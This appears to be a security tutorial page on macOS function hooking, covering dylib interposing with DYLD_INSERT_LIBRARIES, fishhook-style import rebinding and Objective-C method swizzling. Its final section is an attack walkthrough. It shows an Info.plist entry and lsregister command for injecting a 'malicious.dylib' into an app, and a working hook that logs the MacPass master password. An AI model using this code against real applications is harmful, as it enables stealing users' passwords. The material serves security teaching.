macOS Function Hooking
Function Interposing
Create a dylib with an __interpose (__DATA___interpose) section (or a section flagged with S_INTERPOSING) containing tuples of function pointers that refer to the original and the replacement functions.
Then, inject the dylib with DYLD_INSERT_LIBRARIES (the interposing needs occur before the main app loads). Obviously the restrictions applied to the use of DYLD_INSERT_LIBRARIES applies here also.
Interpose printf
```c:interpose.c" overflow="wrap // gcc -dynamiclib interpose.c -o interpose.dylib
include
include
int my_printf(const char *format, ...) { //va_list args; //va_start(args, format); //int ret = vprintf(format, args); //va_end(args);
int ret = printf("Hello from interpose\n");
return ret;
}
attribute((used)) static struct { const void replacement; const void replacee; } _interpose_printf attribute ((section ("__DATA,__interpose"))) = { (const void )(unsigned long)&my_printf, (const void )(unsigned long)&printf };
```c
//gcc hello.c -o hello
#include <stdio.h>
int main() {
printf("Hello World!\n");
return 0;
}
// Just another way to define an interpose
// gcc -dynamiclib interpose2.c -o interpose2.dylib
#include <stdio.h>
#define DYLD_INTERPOSE(_replacement, _replacee) \
__attribute__((used)) static struct { \
const void* replacement; \
const void* replacee; \
} _interpose_##_replacee __attribute__ ((section("__DATA, __interpose"))) = { \
(const void*) (unsigned long) &_replacement, \
(const void*) (unsigned long) &_replacee \
};
int my_printf(const char *format, ...)
{
int ret = printf("Hello from interpose\n");
return ret;
}
DYLD_INTERPOSE(my_printf,printf);
DYLD_INSERT_LIBRARIES=./interpose.dylib ./hello
Hello from interpose
DYLD_INSERT_LIBRARIES=./interpose2.dylib ./hello
Hello from interpose
Warning
The DYLD_PRINT_INTERPOSING env variable can be used to debug interposing and will print the interpose process.
Also note that interposing occurs between the process and the loaded libraries, it doesn't work with the shared library cache.
Dynamic Interposing
Now it's also possible to interpose a function dynamically using the function dyld_dynamic_interpose. This allows to programmatically interpose a function in runtime instead of doing it only from the beginning.
It's just needed to indicate the tuples of the function to replace and the replacement function.
struct dyld_interpose_tuple {
const void* replacement;
const void* replacee;
};
extern void dyld_dynamic_interpose(const struct mach_header* mh,
const struct dyld_interpose_tuple array[], size_t count);
Import Table Rebinding (fishhook-style)
If you already have code execution inside the process and want to hook an imported C function without relaunching the target, a very common primitive is symbol rebinding (popularised by fishhook).
Instead of using the __interpose section, this technique walks the Mach-O metadata (__LINKEDIT -> indirect symbol table -> __la_symbol_ptr / __nl_symbol_ptr) and overwrites the import slot used by the current image. This is very useful to hook functions in an already-running process or to hook just one image with rebind_symbols_image.
Tip
This only affects calls that actually go through an import pointer. If the target function is called directly inside the same image, there is no imported slot to rewrite, so this technique won't see that call site.
// clang -dynamiclib fishhook_demo.c fishhook.c -o fishhook_demo.dylib
#include <stdio.h>
#include <unistd.h>
#include "fishhook.h"
static int (*real_close)(int);
int hooked_close(int fd) {
fprintf(stderr, "[+] close(%d)\n", fd);
return real_close(fd);
}
__attribute__((constructor))
static void install(void) {
struct rebinding rb = {"close", hooked_close, (void *)&real_close};
rebind_symbols(&rb, 1);
}
DYLD_INSERT_LIBRARIES=./fishhook_demo.dylib ./hello
On recent macOS versions many rebinding targets are no longer in writable __DATA pages. Rebinders usually need to temporarily make __DATA_CONST writable before patching the pointer. Moreover, on Apple Silicon / arm64e you should expect authenticated pointers and extra indirection in __AUTH_CONST.__auth_got, so a rebinder that only scans the classic lazy/non-lazy symbol pointer sections may miss some call sites.
Caution
The arm64e ABI uses Pointer Authentication (PAC) for many function pointers. Blind pointer writes that used to work on Intel can break a call site on Apple Silicon. When writing your own rebinder or inline hooker, be ready to use <ptrauth.h> helpers such as ptrauth_sign_unauthenticated or ptrauth_auth_and_resign and test specifically on arm64e targets.
For more details about __AUTH, __AUTH_CONST and __auth_got, check this page.
Method Swizzling
In ObjectiveC this is how a method is called like: [myClassInstance nameOfTheMethodFirstParam:param1 secondParam:param2]
It's needed the object, the method and the params. And when a method is called a msg is sent using the function objc_msgSend: int i = ((int (*)(id, SEL, NSString *, NSString *))objc_msgSend)(someObject, @selector(method1p1:p2:), value1, value2);
The object is someObject, the method is @selector(method1p1:p2:) and the arguments are value1, value2.
Following the object structures, it's possible to reach an array of methods where the names and pointers to the method code are located.
Caution
Note that because methods and classes are accessed based on their names, this information is stored in the binary, so it's possible to retrieve it with otool -ov </path/bin> or class-dump </path/bin>
Accessing the raw methods
It's possible to access the information of the methods such as name, number of params or address like in the following example:
// gcc -framework Foundation test.m -o test
#import <Foundation/Foundation.h>
#import <objc/runtime.h>
#import <objc/message.h>
int main() {
// Get class of the variable
NSString* str = @"This is an example";
Class strClass = [str class];
NSLog(@"str's Class name: %s", class_getName(strClass));
// Get parent class of a class
Class strSuper = class_getSuperclass(strClass);
NSLog(@"Superclass name: %@",NSStringFromClass(strSuper));
// Get information about a method
SEL sel = @selector(length);
NSLog(@"Selector name: %@", NSStringFromSelector(sel));
Method m = class_getInstanceMethod(strClass,sel);
NSLog(@"Number of arguments: %d", method_getNumberOfArguments(m));
NSLog(@"Implementation address: 0x%lx", (unsigned long)method_getImplementation(m));
// Iterate through the class hierarchy
NSLog(@"Listing methods:");
Class currentClass = strClass;
while (currentClass != NULL) {
unsigned int inheritedMethodCount = 0;
Method* inheritedMethods = class_copyMethodList(currentClass, &inheritedMethodCount);
NSLog(@"Number of inherited methods in %s: %u", class_getName(currentClass), inheritedMethodCount);
for (unsigned int i = 0; i < inheritedMethodCount; i++) {
Method method = inheritedMethods[i];
SEL selector = method_getName(method);
const char* methodName = sel_getName(selector);
unsigned long address = (unsigned long)method_getImplementation(m);
NSLog(@"Inherited method name: %s (0x%lx)", methodName, address);
}
// Free the memory allocated by class_copyMethodList
free(inheritedMethods);
currentClass = class_getSuperclass(currentClass);
}
// Other ways to call uppercaseString method
if([str respondsToSelector:@selector(uppercaseString)]) {
NSString *uppercaseString = [str performSelector:@selector(uppercaseString)];
NSLog(@"Uppercase string: %@", uppercaseString);
}
// Using objc_msgSend directly
NSString *uppercaseString2 = ((NSString *(*)(id, SEL))objc_msgSend)(str, @selector(uppercaseString));
NSLog(@"Uppercase string: %@", uppercaseString2);
// Calling the address directly
IMP imp = method_getImplementation(class_getInstanceMethod(strClass, @selector(uppercaseString))); // Get the function address
NSString *(*callImp)(id,SEL) = (typeof(callImp))imp; // Generates a function capable to method from imp
NSString *uppercaseString3 = callImp(str,@selector(uppercaseString)); // Call the method
NSLog(@"Uppercase string: %@", uppercaseString3);
return 0;
}
Method Swizzling with method_exchangeImplementations
The function method_exchangeImplementations allows to change the address of the implementation of one function for the other.
Caution
So when a function is called what is executed is the other one.
//gcc -framework Foundation swizzle_str.m -o swizzle_str
#import <Foundation/Foundation.h>
#import <objc/runtime.h>
// Create a new category for NSString with the method to execute
@interface NSString (SwizzleString)
- (NSString *)swizzledSubstringFromIndex:(NSUInteger)from;
@end
@implementation NSString (SwizzleString)
- (NSString *)swizzledSubstringFromIndex:(NSUInteger)from {
NSLog(@"Custom implementation of substringFromIndex:");
// Call the original method
return [self swizzledSubstringFromIndex:from];
}
@end
int main(int argc, const char * argv[]) {
// Perform method swizzling
Method originalMethod = class_getInstanceMethod([NSString class], @selector(substringFromIndex:));
Method swizzledMethod = class_getInstanceMethod([NSString class], @selector(swizzledSubstringFromIndex:));
method_exchangeImplementations(originalMethod, swizzledMethod);
// We changed the address of one method for the other
// Now when the method substringFromIndex is called, what is really called is swizzledSubstringFromIndex
// And when swizzledSubstringFromIndex is called, substringFromIndex is really called
// Example usage
NSString *myString = @"Hello, World!";
NSString *subString = [myString substringFromIndex:7];
NSLog(@"Substring: %@", subString);
return 0;
}
Warning
In this case if the implementation code of the legit method verifies the method name it could detect this swizzling and prevent it from running.
The following technique doesn't have this restriction.
Method Swizzling with method_setImplementation
The previous format is weird because you are changing the implementation of 2 methods one from the other. Using the function method_setImplementation you can change the implementation of a method for the other one.
Just remember to store the address of the implementation of the original one if you are going to to call it from the new implementation before overwriting it because later it will be much complicated to locate that address.
#import <Foundation/Foundation.h>
#import <objc/runtime.h>
#import <objc/message.h>
static IMP original_substringFromIndex = NULL;
@interface NSString (Swizzlestring)
- (NSString *)swizzledSubstringFromIndex:(NSUInteger)from;
@end
@implementation NSString (Swizzlestring)
- (NSString *)swizzledSubstringFromIndex:(NSUInteger)from {
NSLog(@"Custom implementation of substringFromIndex:");
// Call the original implementation using objc_msgSendSuper
return ((NSString *(*)(id, SEL, NSUInteger))original_substringFromIndex)(self, _cmd, from);
}
@end
int main(int argc, const char * argv[]) {
@autoreleasepool {
// Get the class of the target method
Class stringClass = [NSString class];
// Get the swizzled and original methods
Method originalMethod = class_getInstanceMethod(stringClass, @selector(substringFromIndex:));
// Get the function pointer to the swizzled method's implementation
IMP swizzledIMP = method_getImplementation(class_getInstanceMethod(stringClass, @selector(swizzledSubstringFromIndex:)));
// Swap the implementations
// It return the now overwritten implementation of the original method to store it
original_substringFromIndex = method_setImplementation(originalMethod, swizzledIMP);
// Example usage
NSString *myString = @"Hello, World!";
NSString *subString = [myString substringFromIndex:7];
NSLog(@"Substring: %@", subString);
// Set the original implementation back
method_setImplementation(originalMethod, original_substringFromIndex);
return 0;
}
}
Hooking Attack Methodology
In this page different ways to hook functions were discussed. However, they involved running code inside the process to attack.
In order to do that the easiest technique to use is to inject a Dyld via environment variables or hijacking. However, I guess this could also be done via Dylib process injection.
However, both options are limited to unprotected binaries/processes. Check each technique to learn more about the limitations.
However, a function hooking attack is very specific, an attacker will do this to steal sensitive information from inside a process (if not you would just do a process injection attack). And this sensitive information might be located in user downloaded Apps such as MacPass.
So the attacker vector would be to either find a vulnerability or strip the signature of the application, inject the DYLD_INSERT_LIBRARIES env variable through the Info.plist of the application adding something like:
<key>LSEnvironment</key>
<dict>
<key>DYLD_INSERT_LIBRARIES</key>
<string>/Applications/Application.app/Contents/malicious.dylib</string>
</dict>
and then re-register the application:
/System/Library/Frameworks/CoreServices.framework/Frameworks/LaunchServices.framework/Support/lsregister -f /Applications/Application.app
Add in that library the hooking code to exfiltrate the information: Passwords, messages...
Caution
Note that in newer versions of macOS if you strip the signature of the application binary and it was previously executed, macOS won't be executing the application anymore.
Library example
// gcc -dynamiclib -framework Foundation sniff.m -o sniff.dylib
// If you added env vars in the Info.plist don't forget to call lsregister as explained before
// Listen to the logs with something like:
// log stream --style syslog --predicate 'eventMessage CONTAINS[c] "Password"'
#include <Foundation/Foundation.h>
#import <objc/runtime.h>
// Here will be stored the real method (setPassword in this case) address
static IMP real_setPassword = NULL;
static BOOL custom_setPassword(id self, SEL _cmd, NSString* password, NSURL* keyFileURL)
{
// Function that will log the password and call the original setPassword(pass, file_path) method
NSLog(@"[+] Password is: %@", password);
// After logging the password call the original method so nothing breaks.
return ((BOOL (*)(id,SEL,NSString*, NSURL*))real_setPassword)(self, _cmd, password, keyFileURL);
}
// Library constructor to execute
__attribute__((constructor))
static void customConstructor(int argc, const char **argv) {
// Get the real method address to not lose it
Class classMPDocument = NSClassFromString(@"MPDocument");
Method real_Method = class_getInstanceMethod(classMPDocument, @selector(setPassword:keyFileURL:));
// Make the original method setPassword call the fake implementation one
IMP fake_IMP = (IMP)custom_setPassword;
real_setPassword = method_setImplementation(real_Method, fake_IMP);
}